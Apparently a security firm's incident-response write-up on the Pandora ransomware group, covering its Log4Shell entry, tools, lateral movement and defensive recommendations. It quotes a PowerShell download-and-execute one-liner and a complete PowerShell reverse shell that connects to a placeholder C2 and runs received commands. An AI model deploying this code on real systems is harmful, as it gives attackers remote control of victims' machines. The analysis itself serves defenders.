An Encounter with Pandora

Pandora ransomware came into the spotlight in March of 2022 after posting some high-profile victims on its leak site. The ransomware group announced its first victim on Feb 21st, 2022. Their biggest victim was Denso, a car parts manufacturer. After an attack on one of its offices in Germany, Denso confirmed that cybercriminals leaked stolen, classified information from the Japan-based car-components manufacturer. Pandora claims to have exfiltrated 1TB of data from Denso. So who is this new ransomware group? Have we seen them before? Yes, the team at Inception Security was hired to assist a business that was a victim of Pandora ransomware. We will walk you through our observations, so you are equipped with the information you need to be successful if you encounter this group.

Pandora Ransomeware uses very similar malware to the group Rook. Rook is a ransomware group that used the source code from the Babuk leak. The source code was leaked in a Russian underground forum in September 2021, and now criminals can perform changes or simply improve their arsenal by using the intelligence of this piece.

When Pandora ransomware has been executed, the encrypted files' extension will be changed to ".pandora.". The ransom note is called "Restore_My_Files.txt", as shown in figure 1. The ransom note is recursively placed in all the directories on the impacted hosts.

Figure 1 shows the note that provides contact information amongst other items.

Tactics, Techniques, and Procedures:

We identified the Pandora Ransomware group leveraged the Log4Shell vulnerability on VMHorizon servers during our investigation. The specific vulnerability was the Apache Log4j CVE-2021-44228, which was used to gain initial access to the environment. Once a foothold was established, the Pandora Ransomware group used PowerShell to download their tools and payloads. They used a standard PowerShell method System.Net.WebClient to facilitate the downloads, and threat actors often use this due to the ease of access. The tools retrieved were:

• Ngrok

• Advanced Port Scanner

• SplashTop

• Anydesk

• Cobaltstrike

• Ransomware executable

Example of the PowerShell Script:

$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '."extension"'; $wc.DownloadFile('http://ipaddress/"file", $tempfile); & $tempfile

Directories of where the tools were installed:

• %systemdrive%\Windows\system32\config\systemprofile\

• %systemdrive%\ProgramData\

Pandora ransomware group used Advanced Port Scanner to perform reconnaissance across the environment. Advanced Port, Scanner is a tool we see used often by many threat actors. If this is not used in your environment, it could be a sign you are under attack and should be investigated. Once reconnaissance was complete, we observed the actor moving laterally using domain admin accounts. The group dumped the credentials using CobaltStrike; another tool commonly used to privilege escalate is Mimikatz. When it comes to data exfiltration, there are many ways we have observed data exit an environment; often, we see Rclone and Pcloud. In this investigation, we observed the drag and drop technique that comes with SplashTop to exfil the data. The group then deployed their ransomware that encrypted the data, leaving them with the ".pandora" file extension.

The group used code on Github to establish a C2 on several hosts within the environment to maintain access after the ransomware was deployed. The PowerShell script was running on a regular cadence leveraging scheduled tasks.

# Make DNS over HTTP lookup for specified record type
function DNSLookup ($DNSRecord) {
    return (([text.encoding]::UTF8).GetString((Invoke-WebRequest ('https://1.1.1.1/dns-query?name=powershell-reverse-shell.demo.martinsohn.dk&type=' + $DNSRecord) -Headers @{'accept'='application/dns-json'}).Content) | ConvertFrom-Json).Answer.data.Trim('"')
}

do {
    # Delay before establishing network connection, and between retries
    Start-Sleep -Seconds 1

    # Connect to C2
    try{
        $TCPClient = New-Object Net.Sockets.TCPClient('x.x.x.x', xxxxx)
    } catch {}
} until ($TCPClient.Connected)

$NetworkStream = $TCPClient.GetStream()

$SslStream = New-Object Net.Security.SslStream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]))

$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$false)

if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {
    $SslStream.Close()
    exit
}

$StreamWriter = New-Object IO.StreamWriter($SslStream)

# Writes a string to C2
function WriteToStream ($String) {
    # Create buffer to be used for next network stream read. Size is determined by the TCP client recieve buffer (65536 by default)
    [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}

    # Write to C2
    $StreamWriter.Write($String + 'SHELL> ')
    $StreamWriter.Flush()
}

# Initial output to C2. The function also creates the inital empty byte array buffer used below.
WriteToStream ''

# Loop that breaks if NetworkStream.Read throws an exception - will happen if connection is closed.
while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {
    # Encode command, remove last byte/newline
    $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1)
    
    # Execute command and save output (including errors thrown)
    $Output = try {
            Invoke-Expression $Command 2>&1 | Out-String
        } catch {
            $_ | Out-String
        }

    # Write output to C2
    WriteToStream ($Output)
}
# Closes the StreamWriter and the underlying TCPClient
$StreamWriter.Close()

Based on our analysis, the Pandora group is not only a copycat of Rook ransomware, but the group has also taken pages from the Conti playbook. Additionally, the behavior and TTPs are very similar to what would have been found in a Conti ransomware investigation we have conducted.

Recommendations:

1. Upgrade to the newest patch for the VMHorizon and UAGs.

2. Vulnerability Assessment, conducting a regular assessment will help you understand your attack surface and what systems are vulnerable.

3. Conduct a Risk Assessment, understanding the gaps that exist within your controls will limit the impact of an attack like this.

4. Implement an EDR, this is a host-based solution that has a behavioral detection engine and prevention capabilities. This will provide an environment with the ability to combat this type of attack.

5. Require MFA to RDP into your server infrastructure.

We can help!

Are you looking for ongoing advisory services to assist in identifying vulnerabilities and security policies that should be in place and help improve your security posture? The team at Inception Security™ has been leveraged to enhance the security posture of fortune 100 companies, small and medium-sized businesses. Our team has a depth of knowledge in the cybersecurity industry and will be able to provide value to your business right away.

Contact Inception Security if you are experiencing a ransomware attack.